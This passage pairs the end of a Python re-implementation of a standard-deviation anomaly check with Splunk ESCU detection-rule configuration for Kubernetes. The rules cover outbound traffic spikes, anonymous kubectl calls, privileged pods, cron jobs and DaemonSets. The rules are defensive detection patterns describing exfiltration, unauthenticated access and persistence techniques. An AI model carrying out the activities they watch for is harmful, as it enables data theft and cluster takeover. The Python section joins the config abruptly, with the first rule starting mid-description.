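    "cache:redis": [{"tcp.bytes": 300, "udp.packets": 0}] * 12,                   # no baseline row
}


def baseline(history):
    """The per-key avg/stdev table the rules obtain from the 30-day mstats subsearch or from the
    k8s_container_network_io_baseline lookup: {key: {metric: (avg, stdev)}}. The stdev column
    must be a real (sample) standard deviation; an average stored in its place makes the
    avg + N * stdev threshold meaningless."""
    return {key: {m: (statistics.fmean(v), statistics.stdev(v)) for m, v in metrics.items()}
            for key, metrics in history.items()}


def describe_anomalies(bucket, base, sigma):
    """The foreach stdev_* loop: one note per metric whose value exceeds avg + sigma * stdev.
    A zero stdev (flat baseline) is treated as 'no anomaly' instead of dividing by zero,
    which the SPL version does not guard against."""
    notes = []
    for metric, value in bucket.items():
        if metric not in base:
            continue
        avg, stdev = base[metric]
        if stdev > 0 and value > avg + sigma * stdev:
            z = round((value - avg) / stdev, 2)
            notes.append(f"{metric} higher than average by {z} Standard Deviations. "
                         f"{metric}={value} avg_{metric}={avg:.2f} stdev_{metric}={stdev:.2f}")
    return notes


def detect(current, base, sigma=SIGMA, min_buckets=MIN_ANOMALOUS_BUCKETS):
    """Per key: count the anomalous buckets in the current hour (stats count ... | where count > 5)
    and collect the distinct anomaly notes (values(anomalies))."""
    results = {}
    for key, buckets in current.items():
        if key not in base:
            continue  # join type=left / lookup leaves the baseline null: nothing to compare against
        per_bucket = [describe_anomalies(b, base[key], sigma) for b in buckets]
        count = sum(1 for notes in per_bucket if notes)
        if count > min_buckets:
            results[key] = {"count": count,
                            "anomalies": sorted({n for notes in per_bucket for n in notes})}
    return results


if __name__ == "__main__":
    for key, hit in detect(CURRENT_HOUR, baseline(HISTORY)).items():
        print(key, hit["count"], "anomalous buckets")
        for note in hit["anomalies"]:
            print("  ", note)
```

Running it alerts on web:nginx only: db:postgres has three anomalous samples, below the more-than-five bar, and cache:redis has no baseline row, so nothing can be compared. A flat 30-day history (udp.packets for db:postgres) yields a standard deviation of zero; in SPL that turns the z-score division into a null rather than an alert, so a workload that has never spoken a protocol and suddenly does is invisible to this test and needs a separate rule.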
This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This analytic identifies changes in network communication behavior in a Kubernetes container by examining inbound to outbound network IO ratios. It uses process metrics from an OTEL collector and Kubelet Stats Receiver, and data from Splunk Observability cloud via the Splunk Infrastructure Monitoring Add-on. A lookup table containing average and standard deviation for network IO is used to evaluate anomalies for each container. An event is generated if the anomaly persists over a 1 hour period. These anomalies may indicate security threats such as data exfiltration, command and control communication, or compromised container behavior. They can compromise the confidentiality, availability, and integrity of applications and data, necessitating rapid detection and response. Anomalous network utilization may suggest a compromised container, potentially leading to data breaches, service outages, and unauthorized access within the Kubernetes cluster. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This analytic identifies changes in network communication behavior in a Kubernetes container by examining inbound to outbound network IO ratios. It uses process metrics from an OTEL collector and Kubelet Stats Receiver, and data from Splunk Observability cloud via the Splunk Infrastructure Monitoring Add-on. A lookup table containing average and standard deviation for network IO is used to evaluate anomalies for each container. An event is generated if the anomaly persists over a 1 hour period. 
These anomalies may indicate security threats such as data exfiltration, command and control communication, or compromised container behavior. They can compromise the confidentiality, availability, and integrity of applications and data, necessitating rapid detection and response. Anomalous network utilization may suggest a compromised container, potentially leading to data breaches, service outages, and unauthorized access within the Kubernetes cluster. action.escu.how_to_implement = To implement this detection, follow these steps: \ * Deploy the OpenTelemetry Collector (OTEL) to your Kubernetes cluster.\ * Enable the hostmetrics/process receiver in the OTEL configuration.\ * Ensure that the process metrics, specifically process.cpu.utilization and process.memory.utilization, are enabled.\ * Enable the Kubelet Stats receiver as well: the search reads the k8s.pod.network.io metric, split by its direction dimension, and that receiver is what emits it.\ * Install the Splunk Infrastructure Monitoring (SIM) add-on. (ref: https://splunkbase.splunk.com/app/5247)\ * Configure the SIM add-on with your Observability Cloud Organization ID and Access Token.\ * Set up the SIM modular input to ingest Process Metrics.
Name this input "sim_process_metrics_to_metrics_index".\ * In the SIM configuration, set the Organization ID to your Observability Cloud Organization ID.\ * Set the Signal Flow Program to the following: data('process.threads').publish(label='A'); data('process.cpu.utilization').publish(label='B'); data('process.cpu.time').publish(label='C'); data('process.disk.io').publish(label='D'); data('process.memory.usage').publish(label='E'); data('process.memory.virtual').publish(label='F'); data('process.memory.utilization').publish(label='G'); data('process.cpu.utilization').publish(label='H'); data('process.disk.operations').publish(label='I'); data('process.handles').publish(label='J'); data('process.threads').publish(label='K')\ * Set the Metric Resolution to 10000.\ * Leave all other settings at their default values.\ * Run the Search Baseline Of Kubernetes Container Network IO Ratio action.escu.known_false_positives = unknown action.escu.creation_date = 2023-12-19 action.escu.modification_date = 2023-12-19 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes Anomalous Inbound to Outbound Network IO Ratio - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Abnormal Kubernetes Behavior using Splunk Infrastructure Monitoring"] action.risk = 1 action.risk.param._risk_message = Kubernetes Anomalous Inbound to Outbound Network IO Ratio from Container on host $host$ action.risk.param._risk = [{"risk_object_field": "host", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Kubernetes Anomalous Inbound to Outbound Network IO Ratio - Rule 
action.correlationsearch.annotations = {"analytic_story": ["Abnormal Kubernetes Behavior using Splunk Infrastructure Monitoring"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | mstats avg(k8s.pod.network.io) as io where `kubernetes_metrics` by k8s.cluster.name k8s.pod.name k8s.node.name direction span=10s | eval service = replace('k8s.pod.name', "-\w{5}$|-[abcdef0-9]{8,10}-\w{5}$", "") | eval key = 'k8s.cluster.name' + ":" + 'service' | stats avg(eval(if(direction="transmit", io,null()))) as outbound_network_io avg(eval(if(direction="receive", io,null()))) as inbound_network_io by key service k8s.cluster.name k8s.pod.name k8s.node.name _time | eval inbound:outbound = inbound_network_io/outbound_network_io | eval outbound:inbound = outbound_network_io/inbound_network_io | fields - *network_io | lookup k8s_container_network_io_ratio_baseline key | eval anomalies = "" | foreach stdev_* [ eval anomalies =if( '<<MATCHSTR>>' > ('avg_<<MATCHSTR>>' + 4 * 'stdev_<<MATCHSTR>>'), anomalies + "<<MATCHSTR>> ratio higher than average by " + tostring(round(('<<MATCHSTR>>' - 'avg_<<MATCHSTR>>')/'stdev_<<MATCHSTR>>' ,2)) + " Standard Deviations. <<MATCHSTR>>=" + tostring('<<MATCHSTR>>') + " avg_<<MATCHSTR>>=" + tostring('avg_<<MATCHSTR>>') + " 'stdev_<<MATCHSTR>>'=" + tostring('stdev_<<MATCHSTR>>') + ", " , anomalies) ] | eval anomalies = replace(anomalies, ",\s$", "") | where anomalies!="" | stats count values(anomalies) as anomalies by k8s.cluster.name k8s.node.name k8s.pod.name service | rename service as k8s.service | where count > 5 | rename k8s.node.name as host | `kubernetes_anomalous_inbound_to_outbound_network_io_ratio_filter`

[ESCU - Kubernetes Anomalous Outbound Network Activity from Process - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This detection identifies outbound network traffic volume anomalies from processes running within containerised workloads. Anomalies are provided with context identifying the Kubernetes cluster, the workload name, and the type of anomaly. This detection leverages Network Performance Monitoring metrics harvested using an OTEL collector, and is pulled from Splunk Observability Cloud using the Splunk Infrastructure Monitoring Add-on (https://splunkbase.splunk.com/app/5247). This detection compares the tcp.bytes, tcp.new_sockets, tcp.packets, udp.bytes, udp.packets metrics for source (transmitting) workload process pairs over the last 1 hour, with the average of those metrics for those pairs over the last 30 days in order to detect any anomalously high outbound network activity. Anomalously high outbound network traffic from a process running in a container is a potential indication of data exfiltration, or an indication that the process has been modified. Anomalously high outbound network activity from a process running within a container suggests a potential compromise, which may lead to unauthorized data exfiltration, communication with malicious entities, or the propagation of malware to external systems. The compromised container could also serve as a pivot point for further attacks within the containerized environment.
action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This detection identifies outbound network traffic volume anomalies from processes running within containerised workloads. Anomalies are provided with context identifying the Kubernetes cluster, the workload name, and the type of anomaly. This detection leverages Network Performance Monitoring metrics harvested using an OTEL collector, and is pulled from Splunk Observability Cloud using the Splunk Infrastructure Monitoring Add-on (https://splunkbase.splunk.com/app/5247). This detection compares the tcp.bytes, tcp.new_sockets, tcp.packets, udp.bytes, udp.packets metrics for source (transmitting) workload process pairs over the last 1 hour, with the average of those metrics for those pairs over the last 30 days in order to detect any anomalously high outbound network activity. Anomalously high outbound network traffic from a process running in a container is a potential indication of data exfiltration, or an indication that the process has been modified. Anomalously high outbound network activity from a process running within a container suggests a potential compromise, which may lead to unauthorized data exfiltration, communication with malicious entities, or the propagation of malware to external systems. The compromised container could also serve as a pivot point for further attacks within the containerized environment.
action.escu.how_to_implement = To gather NPM metrics, deploy the OpenTelemetry Collector to the Kubernetes cluster and enable Network Performance Monitoring according to the instructions in Splunk Docs (https://docs.splunk.com/observability/en/infrastructure/network-explorer/network-explorer-setup.html#network-explorer-setup). In order to access those metrics from within Splunk Enterprise and ES, the Splunk Infrastructure Monitoring add-on must be installed and configured on a Splunk Search Head. Once installed, first configure the add-on with your O11y Cloud Org ID and Access Token. Lastly, set up the add-on to ingest metrics from O11y Cloud using the following settings, leaving any other settings at default:\
* Name sim_npm_metrics_to_metrics_index \
* Org ID \
* Signal Flow Program data('tcp.packets').publish(label='A'); data('tcp.bytes').publish(label='B'); data('tcp.new_sockets').publish(label='C'); data('udp.packets').publish(label='D'); data('udp.bytes').publish(label='E') \
* Metric Resolution 10000
action.escu.known_false_positives = unknown
action.escu.creation_date = 2024-01-10
action.escu.modification_date = 2024-01-10
action.escu.confidence = high
action.escu.full_search_name = ESCU - Kubernetes Anomalous Outbound Network Activity from Process - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Kubernetes"]
action.escu.analytic_story = ["Abnormal Kubernetes Behavior using Splunk Infrastructure Monitoring"]
action.risk = 1
action.risk.param._risk_message = Kubernetes Anomalous Outbound Network Activity from Process in kubernetes cluster $host$
action.risk.param._risk = [{"risk_object_field": "host", "risk_object_type": "other", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - Kubernetes Anomalous Outbound Network Activity from Process - Rule
action.correlationsearch.annotations = {"analytic_story": ["Abnormal Kubernetes Behavior using Splunk Infrastructure Monitoring"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | mstats avg(tcp.*) as tcp.* avg(udp.*) as udp.* where `kubernetes_metrics` AND earliest=-1h by k8s.cluster.name source.workload.name source.process.name span=10s | eval key='source.workload.name' + ":" + 'source.process.name' | join type=left key [ mstats avg(tcp.*) as avg_tcp.* avg(udp.*) as avg_udp.* stdev(tcp.*) as stdev_tcp.* stdev(udp.*) as stdev_udp.* where `kubernetes_metrics` AND earliest=-30d latest=-1h by source.workload.name source.process.name | eval key='source.workload.name' + ":" + 'source.process.name' ] | eval anomalies = "" | foreach stdev_* [ eval anomalies =if( '<<MATCHSTR>>' > ('avg_<<MATCHSTR>>' + 3 * 'stdev_<<MATCHSTR>>'), anomalies + "<<MATCHSTR>> higher than average by " + tostring(round(('<<MATCHSTR>>' - 'avg_<<MATCHSTR>>')/'stdev_<<MATCHSTR>>' ,2)) + " Standard Deviations. <<MATCHSTR>>=" + tostring('<<MATCHSTR>>') + " avg_<<MATCHSTR>>=" + tostring('avg_<<MATCHSTR>>') + " 'stdev_<<MATCHSTR>>'=" + tostring('stdev_<<MATCHSTR>>') + ", " , anomalies) ] | fillnull | eval anomalies = split(replace(anomalies, ",\s$$$$", "") ,", ") | where anomalies!="" | stats count(anomalies) as count values(anomalies) as anomalies by k8s.cluster.name source.workload.name source.process.name | where count > 5 | rename k8s.cluster.name as host | `kubernetes_anomalous_outbound_network_activity_from_process_filter`

[ESCU - Kubernetes Anomalous Traffic on Network Edge - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This detection identifies network traffic volume anomalies between workloads in a microservices hosted application, or between a workload and the outside world if the workload is shown as (unknown). This detection leverages Network Performance Monitoring metrics harvested using an OTEL collector, and is pulled from Splunk Observability Cloud using the Splunk Infrastructure Monitoring Add-on (https://splunkbase.splunk.com/app/5247). This detection compares the tcp.bytes, tcp.new_sockets, tcp.packets, udp.bytes, udp.packets metrics between workloads over the last 1 hour, with the average of those metrics over the last 30 days in order to detect any anomalously high inbound or outbound network activity. Unexpected spikes in network traffic may signify unauthorized data transfers, or abnormal behavior within the microservices ecosystem. Such activity might signify data exfiltration or unauthorized lateral movement within the microservices environment. If a bad actor is responsible for this traffic they could compromise additional services or extract sensitive data, potentially leading to data breaches.
action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This detection identifies network traffic volume anomalies between workloads in a microservices hosted application, or between a workload and the outside world if the workload is shown as (unknown). This detection leverages Network Performance Monitoring metrics harvested using an OTEL collector, and is pulled from Splunk Observability Cloud using the Splunk Infrastructure Monitoring Add-on (https://splunkbase.splunk.com/app/5247). This detection compares the tcp.bytes, tcp.new_sockets, tcp.packets, udp.bytes, udp.packets metrics between workloads over the last 1 hour, with the average of those metrics over the last 30 days in order to detect any anomalously high inbound or outbound network activity. Unexpected spikes in network traffic may signify unauthorized data transfers, or abnormal behavior within the microservices ecosystem. Such activity might signify data exfiltration or unauthorized lateral movement within the microservices environment. If a bad actor is responsible for this traffic they could compromise additional services or extract sensitive data, potentially leading to data breaches.
action.escu.how_to_implement = To gather NPM metrics, deploy the OpenTelemetry Collector to the Kubernetes cluster and enable Network Performance Monitoring according to the instructions in Splunk Docs (https://docs.splunk.com/observability/en/infrastructure/network-explorer/network-explorer-setup.html#network-explorer-setup). In order to access those metrics from within Splunk Enterprise and ES, the Splunk Infrastructure Monitoring add-on must be installed and configured on a Splunk Search Head. Once installed, first configure the add-on with your O11y Cloud Org ID and Access Token. Lastly, set up the add-on to ingest metrics from O11y Cloud using the following settings, leaving any other settings at default:\
* Name sim_npm_metrics_to_metrics_index \
* Org ID \
* Signal Flow Program data('tcp.packets').publish(label='A'); data('tcp.bytes').publish(label='B'); data('tcp.new_sockets').publish(label='C'); data('udp.packets').publish(label='D'); data('udp.bytes').publish(label='E') \
* Metric Resolution 10000
action.escu.known_false_positives = unknown
action.escu.creation_date = 2024-01-10
action.escu.modification_date = 2024-01-10
action.escu.confidence = high
action.escu.full_search_name = ESCU - Kubernetes Anomalous Traffic on Network Edge - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Kubernetes"]
action.escu.analytic_story = ["Abnormal Kubernetes Behavior using Splunk Infrastructure Monitoring"]
action.risk = 1
action.risk.param._risk_message = Kubernetes Anomalous Traffic on Network Edge in kubernetes cluster $host$
action.risk.param._risk = [{"risk_object_field": "host", "risk_object_type": "other", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - Kubernetes Anomalous Traffic on Network Edge - Rule
action.correlationsearch.annotations = {"analytic_story": ["Abnormal Kubernetes Behavior using Splunk Infrastructure Monitoring"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | mstats avg(tcp.*) as tcp.* avg(udp.*) as udp.* where `kubernetes_metrics` AND earliest=-1h by k8s.cluster.name source.workload.name dest.workload.name span=10s | eval key='source.workload.name' + ":" + 'dest.workload.name' | join type=left key [ mstats avg(tcp.*) as avg_tcp.* avg(udp.*) as avg_udp.* stdev(tcp.*) as stdev_tcp.* stdev(udp.*) as stdev_udp.* where `kubernetes_metrics` AND earliest=-30d latest=-1h by source.workload.name dest.workload.name | eval key='source.workload.name' + ":" + 'dest.workload.name' ] | eval anomalies = "" | foreach stdev_* [ eval anomalies =if( '<<MATCHSTR>>' > ('avg_<<MATCHSTR>>' + 3 * 'stdev_<<MATCHSTR>>'), anomalies + "<<MATCHSTR>> higher than average by " + tostring(round(('<<MATCHSTR>>' - 'avg_<<MATCHSTR>>')/'stdev_<<MATCHSTR>>' ,2)) + " Standard Deviations. <<MATCHSTR>>=" + tostring('<<MATCHSTR>>') + " avg_<<MATCHSTR>>=" + tostring('avg_<<MATCHSTR>>') + " 'stdev_<<MATCHSTR>>'=" + tostring('stdev_<<MATCHSTR>>') + ", " , anomalies) ] | fillnull | eval anomalies = split(replace(anomalies, ",\s$$$$", "") ,", ") | where anomalies!="" | stats count(anomalies) as count values(anomalies) as anomalies by k8s.cluster.name source.workload.name dest.workload.name | where count > 5 | rename k8s.cluster.name as host | `kubernetes_anomalous_traffic_on_network_edge_filter`

[ESCU - Kubernetes AWS detect suspicious kubectl calls - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following analytic detects anonymous and unauthenticated requests to a Kubernetes cluster. It identifies this behavior by monitoring for API calls from users who have not provided any token or password in their request. This is a significant behavior to identify for a SOC as it indicates a severe misconfiguration that allows unfettered access to a cluster with no traceability to a user or service. The impact of such an attack could be substantial, potentially granting an attacker access to sensitive data or control over the cluster. This detection rule is crucial for maintaining the security and integrity of your Kubernetes infrastructure.
action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic detects anonymous and unauthenticated requests to a Kubernetes cluster. It identifies this behavior by monitoring for API calls from users who have not provided any token or password in their request. This is a significant behavior to identify for a SOC as it indicates a severe misconfiguration that allows unfettered access to a cluster with no traceability to a user or service. The impact of such an attack could be substantial, potentially granting an attacker access to sensitive data or control over the cluster. This detection rule is crucial for maintaining the security and integrity of your Kubernetes infrastructure.
action.escu.how_to_implement = You must install the Splunk Add-on for AWS and the Splunk App for AWS. This search works with CloudWatch logs.
action.escu.known_false_positives = Kubectl calls are not malicious by nature. However, source IP, verb and object can reveal potentially malicious activity, especially anonymous suspicious IPs and sensitive objects such as configmaps or secrets.
action.escu.creation_date = 2023-12-19
action.escu.modification_date = 2023-12-19
action.escu.confidence = high
action.escu.full_search_name = ESCU - Kubernetes AWS detect suspicious kubectl calls - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Kubernetes"]
action.escu.analytic_story = ["Kubernetes Security"]
action.risk = 1
action.risk.param._risk_message = tbd
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - Kubernetes AWS detect suspicious kubectl calls - Rule
action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Security"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `kube_audit` user.username="system:anonymous" user.groups{} IN ("system:unauthenticated") | fillnull | stats count by objectRef.name objectRef.namespace objectRef.resource requestReceivedTimestamp requestURI responseStatus.code sourceIPs{} stage user.groups{} user.uid user.username userAgent verb | rename sourceIPs{} as src_ip, user.username as user | `kubernetes_aws_detect_suspicious_kubectl_calls_filter`

[ESCU - Kubernetes Create or Update Privileged Pod - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic detects the creation of privileged pods in Kubernetes. It identifies this behavior by monitoring Kubernetes Audit logs for the creation of pods with root privileges. This behavior is worth identifying for a SOC as it could potentially allow an attacker to escalate privileges, exploit the kernel, and gain full access to the host's namespace and devices. The impact of such an attack could be severe, leading to unauthorized access to sensitive information, data breaches, and service disruptions.
action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic detects the creation of privileged pods in Kubernetes. It identifies this behavior by monitoring Kubernetes Audit logs for the creation of pods with root privileges. This behavior is worth identifying for a SOC as it could potentially allow an attacker to escalate privileges, exploit the kernel, and gain full access to the host's namespace and devices. The impact of such an attack could be severe, leading to unauthorized access to sensitive information, data breaches, and service disruptions.
action.escu.how_to_implement = The detection is based on data that originates from Kubernetes Audit logs. Ensure that audit logging is enabled in your Kubernetes cluster. Kubernetes audit logs provide a record of the requests made to the Kubernetes API server, which is crucial for monitoring and detecting suspicious activities. Configure the audit policy in Kubernetes to determine what kind of activities are logged. This is done by creating an Audit Policy and providing it to the API server. Use the Splunk OpenTelemetry Collector for Kubernetes to collect the logs. This doc describes how to collect the audit log file: https://github.com/signalfx/splunk-otel-collector-chart/blob/main/docs/migration-from-sck.md
action.escu.known_false_positives = unknown
action.escu.creation_date = 2023-12-14
action.escu.modification_date = 2023-12-14
action.escu.confidence = high
action.escu.full_search_name = ESCU - Kubernetes Create or Update Privileged Pod - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Kubernetes"]
action.escu.analytic_story = ["Kubernetes Security"]
action.risk = 1
action.risk.param._risk_message = Kubernetes privileged pod created by user $user$.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 49}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Kubernetes Create or Update Privileged Pod - Rule
action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Security"], "cis20": ["CIS 13"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `kube_audit` objectRef.resource=pods (verb=create OR verb=update) requestObject.metadata.annotations.kubectl.kubernetes.io/last-applied-configuration=*\"privileged\":true* | fillnull | stats count values(user.groups{}) as user_groups by kind objectRef.name objectRef.namespace objectRef.resource requestObject.kind responseStatus.code sourceIPs{} stage user.username userAgent verb requestObject.metadata.annotations.kubectl.kubernetes.io/last-applied-configuration | rename sourceIPs{} as src_ip, user.username as user | `kubernetes_create_or_update_privileged_pod_filter`

[ESCU - Kubernetes Cron Job Creation - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic detects the creation of a Kubernetes cron job, a task scheduled to run automatically at specified intervals. It identifies this behavior by monitoring Kubernetes Audit logs for creation of a cron job. This behavior is worth identifying for a SOC as it could potentially allow an attacker to execute malicious tasks repeatedly and automatically, posing a significant threat to the integrity and security of the Kubernetes infrastructure. The impact of such an attack could be severe, leading to persistent attacks, service disruptions, or unauthorized access to sensitive information.
action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.007"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic detects the creation of a Kubernetes cron job, a task scheduled to run automatically at specified intervals. It identifies this behavior by monitoring Kubernetes Audit logs for creation of a cron job. This behavior is worth identifying for a SOC as it could potentially allow an attacker to execute malicious tasks repeatedly and automatically, posing a significant threat to the integrity and security of the Kubernetes infrastructure. The impact of such an attack could be severe, leading to persistent attacks, service disruptions, or unauthorized access to sensitive information.
action.escu.how_to_implement = The detection is based on data that originates from Kubernetes Audit logs. Ensure that audit logging is enabled in your Kubernetes cluster. Kubernetes audit logs provide a record of the requests made to the Kubernetes API server, which is crucial for monitoring and detecting suspicious activities. Configure the audit policy in Kubernetes to determine what kind of activities are logged. This is done by creating an Audit Policy and providing it to the API server. Use the Splunk OpenTelemetry Collector for Kubernetes to collect the logs. This doc describes how to collect the audit log file: https://github.com/signalfx/splunk-otel-collector-chart/blob/main/docs/migration-from-sck.md
action.escu.known_false_positives = unknown
action.escu.creation_date = 2023-12-14
action.escu.modification_date = 2023-12-14
action.escu.confidence = high
action.escu.full_search_name = ESCU - Kubernetes Cron Job Creation - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Kubernetes"]
action.escu.analytic_story = ["Kubernetes Security"]
action.risk = 1
action.risk.param._risk_message = Kubernetes cron job creation from user $user$
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 49}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Kubernetes Cron Job Creation - Rule
action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Security"], "cis20": ["CIS 13"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.007"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `kube_audit` verb=create "objectRef.resource"=cronjobs | fillnull | stats count values(user.groups{}) as user_groups by kind objectRef.name objectRef.namespace objectRef.resource requestObject.kind requestObject.spec.schedule requestObject.spec.jobTemplate.spec.template.spec.containers{}.image responseStatus.code sourceIPs{} stage user.username userAgent verb | rename sourceIPs{} as src_ip, user.username as user | `kubernetes_cron_job_creation_filter`

[ESCU - Kubernetes DaemonSet Deployed - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic detects the creation of a DaemonSet in a Kubernetes cluster. A DaemonSet ensures the presence of a specific pod on every node in the cluster, making it an ideal avenue for persistent access. This behavior is identified by monitoring Kubernetes Audit logs for the creation of a DaemonSet. The identified behavior is worth noting for a SOC as it could potentially allow an attacker to maintain persistent access to the Kubernetes infrastructure. The impact of such an attack could be severe, leading to persistent attacks, service disruptions, or unauthorized access to sensitive information.
action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic detects the creation of a DaemonSet in a Kubernetes cluster. A DaemonSet ensures the presence of a specific pod on every node in the cluster, making it an ideal avenue for persistent access. This behavior is identified by monitoring Kubernetes Audit logs for the creation of a DaemonSet. The identified behavior is worth noting for a SOC as it could potentially allow an attacker to maintain persistent access to the Kubernetes infrastructure. The impact of such an attack could be severe, leading to persistent attacks, service disruptions, or unauthorized access to sensitive information.
action.escu.how_to_implement = The detection is based on data that originates from Kubernetes Audit logs. Ensure that audit logging is enabled in your Kubernetes cluster. Kubernetes audit logs provide a record of the requests made to the Kubernetes API server, which is crucial for monitoring and detecting suspicious activities. Configure the audit policy in Kubernetes to determine what kind of activities are logged. This is done by creating an Audit Policy and providing it to the API server. Use the Splunk OpenTelemetry Collector for Kubernetes to collect the logs. This doc describes how to collect the audit log file: https://github.com/signalfx/splunk-otel-collector-chart/blob/main/docs/migration-from-sck.md
